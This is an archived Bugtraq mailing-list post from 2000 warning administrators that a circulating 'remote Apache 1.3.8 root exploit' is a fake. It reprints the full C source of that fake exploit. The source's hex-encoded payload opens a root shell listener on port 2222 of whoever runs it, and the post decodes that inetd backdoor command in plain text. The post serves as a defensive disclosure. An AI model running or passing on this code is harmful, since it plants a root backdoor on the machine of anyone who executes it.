Bugtraq mailing list archives

don't run random "exploit" code

From: marcs () ZNEP COM (Marc Slemko)
Date: Tue, 8 Feb 2000 14:55:48 -0700


-----BEGIN PGP SIGNED MESSAGE-----

Below is some code that I have seen a number of times, with some
very slight variations, over the past few months.  I have no idea
how many people have been tricked by it.  This does not exploit
any hole in Apache, period.  As a simple inspection shows you, it
will run:

echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h

on the local machine.  If you try this "exploit" as root, it will
certainly try to compromise your machine.  But not remotely and it
is nothing to do with Apache or any bug other than the "bug" of
admins running random code as root.

I know this should be too obvious to have to say and should be no news to
anyone here, but: do not run random supposed exploits as root on your box
without knowing what they do.  Do not even run them as a non-root UID
unless it is a throwaway UID (better yet, a throw away box) and you have
examined what the program does.  This obviously applies to things posted
to bugtraq but, even more so, to "secret" exploits you may find or be
sent.

Again: the below code has nothing to do with any supposed security hole
in Apache.

To top it all off, in this case is the fact is that there was never
an Apache 1.3.8 released to exploit.  Apache went from 1.3.6 to
1.3.9.

I am posting this to chop off any rumors of a "secret" Apache root exploit
at the knees as well as to give people an example of why they shouldn't do
silly things.

Thanks.

/* remote apache 1.3.8 root exploit (linux) */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
         "\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
         "\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
         "\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
         "\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
         "\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
         "\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";

#define NOP     0x90
#define BSIZE   256
#define OFFSET  400
#define ADDR    0xbffff658
#define ASIZE   2000

int
main(int argc, char *argv[])
{
        char *buffer;
        int s;
        struct hostent *hp;
        struct sockaddr_in sin;
        if (argc != 2) {
                printf("%s <target>\n", argv[0]);
                exit(1);
          }
        buffer = (char *) malloc(BSIZE + ASIZE + 100);
        if (buffer == NULL) {
                printf("Not enough memory\n");
                exit(1);
          }
        memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
                strlen(shellcode));
        buffer[BSIZE + ASIZE] = ';';
        buffer[BSIZE + ASIZE + 1] = '\0';
        hp = gethostbyname(argv[1]);
        if (hp == NULL) {
                printf("no such server\n");
                exit(1);
          }
        bzero(&sin, sizeof(sin));
        bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s < 0) {
                printf("Can't open socket\n");
                exit(1);
          }
        if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
                printf("Connection refused\n");
                exit(1);
          }
        printf("sending exploit code...\n");
        if (send(s, buffer, strlen(buffer), 0) != 1)
                printf("exploit was successful!\n");
          else
                printf("sorry, this site isn't vulnerable\n");
        printf("waiting for shell.....\n");
        if (fork() == 0)
              execl("/bin/sh", "sh", "-c", shellcode, 0);
          else
                wait(NULL);
        while (1) { /* shell */ }
}

- --
     Marc Slemko     | Apache Software Foundation member
     marcs () znep com  | marc () apache org

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOKCQ51Qv/g4Arev1AQEsqwP/Rs5+WrJtuTavrvpPh2Fwfc5twpYVDTrh
mlLUYzfReB8T0gUDgjr5/SEO/KDcn/i+qwQ8V7y5XWqRLUx4j+QVZNW+HIzQnoH3
6cbqIUT1vH49fMQIO/5tsuYvFlRX+sN/HIILTtVlc32Ok9TOBapiRTfSl29tROjS
SolcNQONdyk=
=6HcL
-----END PGP SIGNATURE-----

Current thread:

Re: Statistical Attack Against Virtual Banks, (continued)
- - - Re: Statistical Attack Against Virtual Banks Andre L. Dos Santos (Feb 08)
    - SCO OpenServer SNMPD vulnerability NAI Labs (Feb 07)
    - Re: Tempfile vulnerabilities Werner Koch (Feb 02)
    - Re: Tempfile vulnerabilities Chris Cappuccio (Feb 03)
    - Cross Site Scripting security issue Robert Zilbauer (Feb 02)
    - Re: Tempfile vulnerabilities Len Budney (Feb 03)
    - Re: Tempfile vulnerabilities antirez (Feb 05)
    - Re: Tempfile vulnerabilities Ian Turner (Feb 07)
    - Re: Tempfile vulnerabilities Seth David Schoen (Feb 07)
    - Remote access vulnerability in all MySQL server versions Robert van der Meulen (Feb 08)
    - don't run random "exploit" code Marc Slemko (Feb 08)
    - cookies - nothing new Steven Champeon (Feb 07)
    - Re: cookies - nothing new MJE (Feb 08)
    - Re: Tempfile vulnerabilities Peter Berendi (Feb 08)
    - Re: Tempfile vulnerabilities Marc Lehmann (Feb 08)
  - Re: Tempfile vulnerabilities Neil Blakey-Milner (Feb 02)
- Re: Tempfile vulnerabilities Niall R. Murphy (Feb 01)
- Re: Tempfile vulnerabilities Horst von Brand (Feb 09)

Bugtraq mailing list archives

don't run random &quot;exploit&quot; code

Current thread:

don't run random "exploit" code